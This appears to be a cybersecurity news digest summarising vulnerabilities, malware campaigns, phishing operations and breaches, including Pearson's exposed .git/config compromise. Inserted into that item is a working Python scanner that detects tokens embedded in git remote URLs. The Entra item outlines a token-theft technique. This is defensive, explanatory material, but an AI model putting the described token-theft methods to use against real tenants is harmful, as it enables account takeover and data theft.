The vulnerabilities span a range of severity levels, with some enabling privilege escalation and remote code execution, as demonstrated by the ASUS DriverHub flaw. Cyble has issued weekly vulnerability reports, emphasizing the presence of zero-day vulnerabilities and active exploits targeting popular IT products. Specific details include Commvault updating its advisory for a critical Commvault Command Center Vulnerability (CVE-2025-34028) and Ubuntu releasing a security notice (USN-7506-3) addressing multiple vulnerabilities within the Linux kernel (FIPS). These instances underscore the need for comprehensive vulnerability management strategies for both enterprises and individual users.

Security experts emphasize the critical role of timely patching and robust vulnerability management practices in mitigating these risks. For example, Arctic Wolf noted that updating to Commvault versions 11.38.20 or 11.38.25 alone is insufficient to fully address the CVE-2025-34028 vulnerability. Ubuntu users are advised to perform a standard system update followed by a reboot to apply the necessary Linux kernel fixes, while also being aware of the need to recompile and reinstall third-party kernel modules due to an unavoidable ABI change. Organizations are urged to implement proactive security measures, including continuous monitoring, vulnerability scanning, and rapid deployment of security patches to protect their systems from exploitation.

Recommended read:
References :
  • cyberinsider.com: Critical Flaw in ASUS DriverHub Exposes Users to Remote Code Execution

@cyberpress.org //
Critical security vulnerabilities have been discovered in Mitel SIP phones, potentially exposing enterprise communication systems to unauthorized access and control. The flaws impact widely deployed models, including the 6800, 6900, and 6900w Series, as well as the 6970 Conference Unit. These vulnerabilities include a command injection flaw (CVE-2025-47188) and an unauthenticated file upload vulnerability (CVE-2025-47187). Mitel has issued a security advisory, MISA-2025-0004, urging users to update their devices immediately.

Mitel's critical command injection vulnerability (CVE-2025-47188) allows unauthenticated attackers with network access to execute arbitrary commands on affected phones. The flaw stems from insufficient sanitization of parameters within the device’s web management interface. With a CVSS score of 9.8, exploitation of this vulnerability could grant attackers control over the device, enabling them to exfiltrate sensitive data, alter system settings, and disrupt operations. This could also allow attackers to use the compromised device as a foothold to pivot deeper into enterprise networks.

The affected devices are Mitel 6800, 6900, and 6900w Series SIP Phones, and the 6970 Conference Unit running firmware version R6.4.0.SP4 or earlier. Mitel recommends upgrading to firmware version R6.4.0.SP5 or newer releases to mitigate these risks. While Mitel suggests keeping SIP phones on protected internal networks, organizations with expansive and poorly segmented networks remain at heightened risk.

Recommended read:
References :
  • cyberpress.org: Hackers Can Exploit Mitel SIP Phone Vulnerabilities to Run Malicious Commands
  • Cyber Security News: Critical Vulnerabilities in Mitel SIP Phones Let Attackers Inject Malicious Commands
  • gbhackers.com: Mitel SIP Phone Flaws Allow Attackers to Inject Malicious Commands
  • securityonline.info: Critical Vulnerabilities Uncovered in Mitel SIP Phones: Command Injection and File Upload Risks

@www.webroot.com //
Cybercriminals are increasingly using sophisticated tactics to deceive individuals and steal sensitive information. One common method involves sending fraudulent text messages, known as smishing, that impersonate legitimate businesses like delivery services or banks. These scams often entice victims to click on malicious links, leading to identity theft, financial loss, or the installation of malware. Webroot stresses mobile security, in particular protecting phones from text scams that can lead to identity theft and malware installation. The Federal Trade Commission reported that consumers lost $470 million to scams initiated through text messages in 2024.

Google is intensifying its efforts to combat these online threats by integrating artificial intelligence across its various platforms. The company is leveraging AI in Search, Chrome, and Android to identify and block scam attempts more effectively. Google's AI-powered defenses are capable of detecting 20 times more scam pages than before, significantly improving the quality of search results. Furthermore, AI is used to identify fraudulent websites, app notifications, calls, and direct messages, helping to safeguard users from various scam tactics.

A key component of Google's enhanced protection is the integration of Gemini Nano, a lightweight, on-device AI model, into Chrome. This allows for instant identification of scams, even those that haven't been previously encountered. When a user navigates to a potentially dangerous page, Chrome evaluates the page using Gemini Nano, which extracts security signals to determine the intent of the page. This information is then sent to Safe Browsing for a final verdict, adding an extra layer of protection against evolving online threats.

Recommended read:
References :
  • www.eweek.com: Google is intensifying efforts to combat online scams by integrating artificial intelligence across Search, Chrome, and Android, aiming to make fraud more difficult for cybercriminals.
  • www.webroot.com: It all starts so innocently. You get a text saying "Your package couldn't be delivered. Click here to reschedule." Little do you know, clicking that link could open the door for scammers to steal your identity, empty your bank account, or even plant malicious software (malware) on your device. Unless you know what to look out

@cyberpress.org //
References: cyberpress.org , gbhackers.com , MeatMutts ...
A new method has emerged for stealing Microsoft Entra refresh tokens using Beacon Command & Control (C2) frameworks. This novel technique leverages browser-based authorization flows and Windows API functions to bypass traditional detection mechanisms, allowing attackers to maintain persistent access to cloud resources, even on devices not joined to a domain. The exploit utilizes Beacon Object Files (BOFs) to extract Entra tokens from compromised endpoints, posing a significant risk to enterprise cloud environments. By exploiting the OAuth 2.0 authorization code flow with modifications for offensive operations, attackers can initiate a hidden browser session and scrape the authorization code from the browser window title using the GetWindowTextA Win32 API.

The attack method capitalizes on First-Party Client IDs (FOCI) such as Microsoft Teams, allowing access to multiple Microsoft services through "family refresh tokens." This provides operational advantages by blending token requests with legitimate user activity as they originate from the compromised host's IP address. Furthermore, it is compatible with Bring Your Own Device (BYOD) scenarios, where traditional Primary Refresh Token (PRT) extraction methods fail. After acquiring refresh tokens, attackers can conduct AzureAD reconnaissance via tools like ROADrecon.

A separate but related flaw in Microsoft Entra ID's legacy login process has also been exploited to bypass MFA and Conditional Access, targeting admin accounts across various sectors including finance, healthcare, manufacturing, and technology. This vulnerability resides in the Basic Authentication Version 2 – Resource Owner Password Credential (BAV2ROPC), a legacy login method that allows authentication using simple usernames and passwords. The attacks, which occurred between March 18 and April 7, 2025, demonstrate the dangers of outdated authentication protocols in cloud environments, highlighting how attackers can circumvent modern protections by exploiting compatibility features within Entra ID.

Recommended read:
References :
  • cyberpress.org: A novel technique for extracting Microsoft Entra refresh tokens via Beacon Command & Control (C2) frameworks has emerged, leveraging browser-based authorization flows and Windows API functions to bypass traditional detection mechanisms.
  • gbhackers.com: A novel exploit method leveraging Beacon Object Files (BOFs) has emerged, enabling attackers to extract Microsoft Entra (formerly Azure AD) tokens from compromised endpoints
  • cyberpress.org: Legacy Protocol Flaws in Microsoft Entra ID Let Hackers Bypass MFA and Conditional Access
  • MeatMutts: Legacy Authentication Exploited: Microsoft Entra ID Breach Exposes Cloud Security Risks
  • www.techradar.com: This Microsoft 365 phishing campaign can bypass MFA - here's what we know

@cyberalerts.io //
A new malware campaign is exploiting the hype surrounding artificial intelligence to distribute the Noodlophile Stealer, an information-stealing malware. Morphisec researcher Shmuel Uzan discovered that attackers are enticing victims with fake AI video generation tools advertised on social media platforms, particularly Facebook. These platforms masquerade as legitimate AI services for creating videos, logos, images, and even websites, attracting users eager to leverage AI for content creation.

Posts promoting these fake AI tools have garnered significant attention, with some reaching over 62,000 views. Users who click on the advertised links are directed to bogus websites, such as one impersonating CapCut AI, where they are prompted to upload images or videos. Instead of receiving the promised AI-generated content, users are tricked into downloading a malicious ZIP archive named "VideoDreamAI.zip," which contains an executable file designed to initiate the infection chain.

The "Video Dream MachineAI.mp4.exe" file within the archive launches a legitimate binary associated with ByteDance's CapCut video editor, which is then used to execute a .NET-based loader. This loader, in turn, retrieves a Python payload from a remote server, ultimately leading to the deployment of the Noodlophile Stealer. This malware is capable of harvesting browser credentials, cryptocurrency wallet information, and other sensitive data. In some instances, the stealer is bundled with a remote access trojan like XWorm, enabling attackers to gain entrenched access to infected systems.

Recommended read:
References :
  • malware.news: Novel Noodlophile Stealer spread via bogus AI tools, Facebook ads
  • thehackernews.com: Threat actors have been observed leveraging fake artificial intelligence (AI)-powered tools as a lure to entice users into downloading an information stealer malware dubbed Noodlophile.
  • www.bleepingcomputer.com: Fake AI video generators drop new Noodlophile infostealer malware
  • securityaffairs.com: Threat actors use fake AI tools to trick users into installing the information stealer Noodlophile, Morphisec researchers warn.
  • Blog: New ‘Noodlophile’ infostealer disguised as AI video generator
  • Virus Bulletin: Morphisec's Shmuel Uzan reveals how attackers exploit AI hype to spread malware. Victims expecting custom AI videos instead get Noodlophile Stealer, a new infostealer targeting browser credentials, crypto wallets, and sensitive data.
  • www.scworld.com: Fake image-to-video AI sites deliver novel ‘Noodlophile’ infostealer
  • securityonline.info: Security Online details on the fake platforms
  • SOC Prime Blog: SocPrime blog on Noodlophile Stealer detection
  • socprime.com: SocPrime Article on Noodlophile
  • www.cybersecurity-insiders.com: CyberSecurity Insiders on malware

@cyberpress.org //
A joint investigation by SentinelLABS and Validin has exposed a massive cryptocurrency phishing operation named "FreeDrain." This industrial-scale network has been siphoning digital assets for years by exploiting weaknesses in free publishing platforms. FreeDrain utilizes aggressive SEO manipulation, free-tier web services like gitbook.io, webflow.io, and github.io, along with sophisticated layered redirection techniques to lure unsuspecting victims. The operation's primary goal is to steal cryptocurrency wallet login credentials and seed phrases, often resulting in rapid fund exfiltration.

FreeDrain operators achieve high search engine rankings by creating over 38,000 malicious subdomains on trusted platforms, including Amazon S3 and Azure Web Apps. These subdomains host lure pages that often feature AI-generated content and screenshots of legitimate wallet interfaces. When users search for wallet-related queries, they are redirected through comment-spammed URLs and custom redirector domains to highly convincing phishing clones. These phishing pages frequently include live chat widgets manned by real human operators who encourage victims to submit their credentials.

Researchers believe the operators are based in the UTC+05:30 timezone (Indian Standard Time) and work standard weekday hours. The sophistication of FreeDrain lies in its scale, automation, and ability to avoid traditional phishing email delivery vectors. Victims are funneled from benign-seeming search queries directly to malicious pages ranked at the top of major search engines. Validin first became aware of FreeDrain on May 12, 2024, after a victim reported losing approximately 8 BTC (around $500,000 at the time) to a phishing site.

Recommended read:
References :

@cyble.com //
More than 40 hacktivist groups have launched a coordinated cyber campaign against India following a terror attack in Pahalgam, Jammu and Kashmir, on April 22. The cyberattacks are a reflection of the ongoing tensions between India and Pakistan, particularly concerning the Kashmir region. These hacktivist groups, united under the banner of #OpIndia, are targeting key Indian government portals, healthcare infrastructure, and cyber defense agencies.

The coordinated cyber campaign involves various types of attacks, including website defacements and Denial-of-Service (DoS) attacks aimed at disrupting services. Hacktivist groups have also claimed data breaches. The attacks reflect a familiar pattern where cyber activity escalates during times of real-world tension between India and Pakistan, with hacktivist groups from both sides launching attacks in response to events on the ground.

The cyber retaliation between India and Pakistan is not new, with digital skirmishes becoming more frequent during political or military flare-ups. Over the years, cyber activity related to India has grown, including hacktivist campaigns, data leaks, and the sale of stolen information on the Dark Web. While some incidents are low impact or symbolic, they often align with events on the ground, demonstrating how the conflict now extends into cyberspace.

Recommended read:
References :
  • cyble.com: India Experiences Surge in Hacktivist Group Activity Amid Military Tensions
  • thecyberexpress.com: Over 40 Hacktivist Groups Target India in Coordinated Cyber Campaign: High Noise, Low Impact
  • Secure Bulletin: Tactical reality behind the India-Pakistan hacktivist surge
  • securebulletin.com: Tactical reality behind the India-Pakistan hacktivist surge

@arcticwolf.com //
References: Arctic Wolf , malware.news
Commvault has issued updated advisories regarding a critical vulnerability, CVE-2025-34028, affecting Commvault Command Center. The flaw allows for remote code execution, posing a significant risk to organizations utilizing the platform. Initial patches were released, but Commvault has since clarified that simply being on versions 11.38.20 or 11.38.25 is not enough to fully remediate the vulnerability. Specific updates within those versions are required to effectively address the security gap, a point Commvault clarified on May 7, 2025.

The Cybersecurity and Infrastructure Security Agency (CISA) has added the Commvault Command Center vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. This designation underscores the severity of the flaw and the potential for active exploitation, prompting immediate action from organizations to apply the necessary updates. Fortunately, Commvault seems to have resolved the issue where the "Upgrade software" option was not working for unregistered systems. It is now possible to obtain the necessary fixes for CVE-2025-34028 by clicking "Upgrade now," even without being registered with Commvault.

However, the "Check updates" button in the "Download or copy software" section is still malfunctioning. It incorrectly reports systems as "Up-to-date" even when they are not fully patched against CVE-2025-34028. Users must ensure they have the appropriate specific updates within versions 11.38.20 or 11.38.25 as mentioned in Commvault's clarified advisory to achieve full remediation. Staying vigilant, monitoring security advisories, and diligently applying patches and updates are crucial for maintaining a robust security posture and mitigating potential cyber threats.

Recommended read:
References :
  • Arctic Wolf: Follow-Up: Commvault Updates Advisory With Fixed Versions for Critical Commvault Command Center Vulnerability (CVE-2025-34028)
  • malware.news: News about Commvault updates addressing a critical vulnerability.

Dissent@DataBreaches.Net //
Pearson, the global education and publishing giant, has confirmed it suffered a cyberattack resulting in the theft of corporate data and customer information. The breach was discovered by BleepingComputer, who reported that the attackers gained unauthorized access to Pearson's systems. Pearson, a UK-based company, is a major player in academic publishing, digital learning tools, and standardized assessments, serving schools, universities, and individuals across over 70 countries.

Pearson stated that after discovering the unauthorized access, it acted, with forensics experts, to stop the breach, investigate the incident, and ascertain what data was affected. It also supported law enforcement's investigation. Furthermore, Pearson said it has taken steps to deploy additional security measures on its systems, including enhanced security monitoring and authentication. BleepingComputer was tipped off that someone used an exposed GitLab Personal Access Token to compromise Pearson's development environment in January 2025. The token was found in a public .git/config file; the attackers used this access to find further login credentials hardcoded in the source code, which they then used to infiltrate the company's network and steal corporate and customer information.

The company downplayed the significance of the breach, suggesting the stolen data was largely outdated, referring to it as "legacy data." Pearson has not disclosed the number of individuals affected, nor the specific types of information exposed. The company did confirm that no employee information was among the stolen files.
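The exposed .git/config chain described above, as an added example that is not part of the original report or of Pearson's or BleepingComputer's code: a pre-publish check that parses a .git/config, reports remote URLs carrying a token in their userinfo part, flags a plaintext credential helper, and catches .git paths in a deployment file list. The sample config, host names and token value are constructed placeholders.

```python
"""Pre-publish check for git metadata that should never reach a web root.

Added example: parses a .git/config, reports remote URLs that embed a
password or token in the userinfo part, flags the plaintext credential
helper, and lists .git paths found in a deployment artifact.
"""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit, urlunsplit

SECTION_RE = re.compile(r'^\s*\[\s*([^\s\]"]+)(?:\s+"([^"]*)")?\s*\]\s*$')
KEY_RE = re.compile(r'^\s*([A-Za-z][A-Za-z0-9-]*)\s*=\s*(.*?)\s*$')

# Constructed sample .git/config; the token and hosts are placeholders, not real values.
SAMPLE_GIT_CONFIG = """\
[core]
\trepositoryformatversion = 0
\tbare = false
[remote "origin"]
\turl = https://deploy-bot:glpat-PLACEHOLDER_TOKEN@gitlab.example.com/group/site.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
[remote "mirror"]
\turl = git@github.example.com:group/site.git
\tfetch = +refs/heads/*:refs/remotes/mirror/*
[credential]
\thelper = store
"""

Section = Tuple[str, str]  # e.g. ("remote", "origin"); subsection is "" when absent


def parse_git_config(text: str) -> Dict[Section, Dict[str, str]]:
    """Minimal parser for git's INI-like config: [section "subsection"] and key = value lines."""
    sections: Dict[Section, Dict[str, str]] = {}
    current: Optional[Section] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":  # blank lines and comments
            continue
        m = SECTION_RE.match(line)
        if m:
            current = (m.group(1).lower(), m.group(2) or "")
            sections.setdefault(current, {})
            continue
        m = KEY_RE.match(line)
        if m and current is not None:
            sections[current][m.group(1).lower()] = m.group(2)
    return sections


def redact_url(url: str) -> str:
    """Drop the user:password@ part of an http(s) URL, keeping scheme, host, port and path."""
    p = urlsplit(url)
    host = p.hostname or ""
    if p.port:
        host = f"{host}:{p.port}"
    return urlunsplit((p.scheme, host, p.path, p.query, p.fragment))


def find_embedded_credentials(text: str) -> List[Tuple[str, str, str]]:
    """Return (section, key, redacted_url) for every *url key whose http(s) URL embeds a password/token."""
    findings: List[Tuple[str, str, str]] = []
    for (name, sub), keys in parse_git_config(text).items():
        for key, value in keys.items():
            if not key.endswith("url"):
                continue
            p = urlsplit(value)  # scp-style "git@host:path" yields no scheme and no userinfo
            if p.scheme in ("http", "https") and p.password is not None:
                label = f'{name} "{sub}"' if sub else name
                findings.append((label, key, redact_url(value)))
    return findings


def uses_plaintext_credential_store(text: str) -> bool:
    """True when [credential] helper = store is set, i.e. tokens are written unencrypted to ~/.git-credentials."""
    cfg = parse_git_config(text)
    return cfg.get(("credential", ""), {}).get("helper", "").strip() == "store"


def git_paths_in_artifact(paths: List[str]) -> List[str]:
    """Return every path in a deployment file list that lives inside a .git directory."""
    return [p for p in paths if ".git" in p.replace("\\", "/").split("/")]


if __name__ == "__main__":
    for section, key, url in find_embedded_credentials(SAMPLE_GIT_CONFIG):
        print(f"credential embedded in [{section}] {key}: {url}")
    if uses_plaintext_credential_store(SAMPLE_GIT_CONFIG):
        print("credential.helper=store: tokens would be cached in plaintext")
    print(git_paths_in_artifact(["index.html", ".git/config", "assets/app.js"]))
```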

Recommended read:
References :
  • DataBreaches.Net: Lawrence Abrams reports: Education giant Pearson suffered a cyberattack, allowing threat actors to steal corporate data and customer information, BleepingComputer has learned.
  • BleepingComputer: Education giant Pearson suffered a cyberattack, allowing threat actors to steal corporate data and customer information, BleepingComputer has learned.
  • www.techradar.com: Another case of exposed Git configuration files leading up to a larger compromise, this time against education giant Pearson.
  • malware.news: Cyberattack compromises Pearson data

@owaspai.org //
References: OWASP , Bernard Marr
The Open Worldwide Application Security Project (OWASP) is actively shaping the future of AI regulation through its AI Exchange project. This initiative fosters collaboration between the global security community and formal standardization bodies, driving the creation of AI security standards designed to protect individuals and businesses while encouraging innovation. By establishing a formal liaison with international standardization organizations like CEN/CENELEC, OWASP is enabling its vast network of security professionals to directly contribute to the development of these crucial standards, ensuring they are practical, fair, and effective.

OWASP's influence is already evident in the development of key AI security standards, notably impacting the AI Act, a European Commission initiative. Through the contributions of experts like Rob van der Veer, who founded the OWASP AI Exchange, the project has provided significant input to ISO/IEC 27090, the global standard on AI security guidance. The OWASP AI Exchange serves as an open-source platform where experts collaborate to shape these global standards, ensuring a balance between strong security measures and the flexibility needed to support ongoing innovation.

The OWASP AI Exchange provides over 200 pages of practical advice and references on protecting AI and data-centric systems from threats. This resource serves as a bookmark for professionals and actively contributes to international standards, demonstrating the consensus on AI security and privacy through collaboration with key institutes and Standards Development Organizations (SDOs). The foundation of OWASP's approach lies in risk-based thinking, tailoring security measures to specific contexts rather than relying on a one-size-fits-all checklist, addressing the critical need for clear guidance and effective regulation in the rapidly evolving landscape of AI security.

Recommended read:
References :
  • OWASP: OWASP Enables AI Regulation That Works with OWASP AI Exchange
  • Bernard Marr: Take These Steps Today To Protect Yourself Against AI Cybercrime

@securityonline.info //
Microsoft has recently addressed several critical security vulnerabilities affecting its Azure cloud services and Microsoft Power Apps. The flaws, identified in Azure Automation, Azure Storage, Azure DevOps, and Microsoft Power Apps, highlighted the importance of proactive security measures within cloud-native development environments. One vulnerability, CVE-2025-29813, received the maximum Common Vulnerability Scoring System (CVSS) score of 10, indicating its severity.

The most critical vulnerability, found in Azure DevOps, allowed attackers with project-level access to escalate their privileges by exchanging short-term pipeline job tokens for long-term ones, potentially gaining extensive access within a project environment. Additional vulnerabilities included CVE-2025-29827 in Azure Automation, where improper authorization could enable a user to elevate privileges; CVE-2025-29972, an SSRF vulnerability in Azure Storage Resource Provider; and CVE-2025-47733 in Microsoft Power Apps, which allowed unauthorized information disclosure over a network through Server-Side Request Forgery (SSRF).

Despite the severity of these vulnerabilities, Microsoft has assured users that no action is required on their part. The company has already mitigated the flaws at the platform level, preventing potential exploitation. These patches underscore Microsoft's commitment to maintaining a secure cloud environment and highlight the ongoing need for robust security practices within cloud-native development.

Recommended read:
References :
  • securityonline.info: Microsoft Patches Four Critical Azure and Power Apps Vulnerabilities, Including CVSS 10 Privilege Escalation
  • Talkback Resources: Microsoft addressed critical vulnerabilities in various Azure services, including Azure Automation, Azure Storage, Azure DevOps, and Microsoft Power Apps, emphasizing the need for proactive security measures in cloud-native development environments.
  • Davey Winder: Microsoft has confirmed several cloud security vulnerabilities, including one with a maximum critical rating of 10.
  • Davey Winder: Critical 10/10 Microsoft Cloud Security Vulnerability Confirmed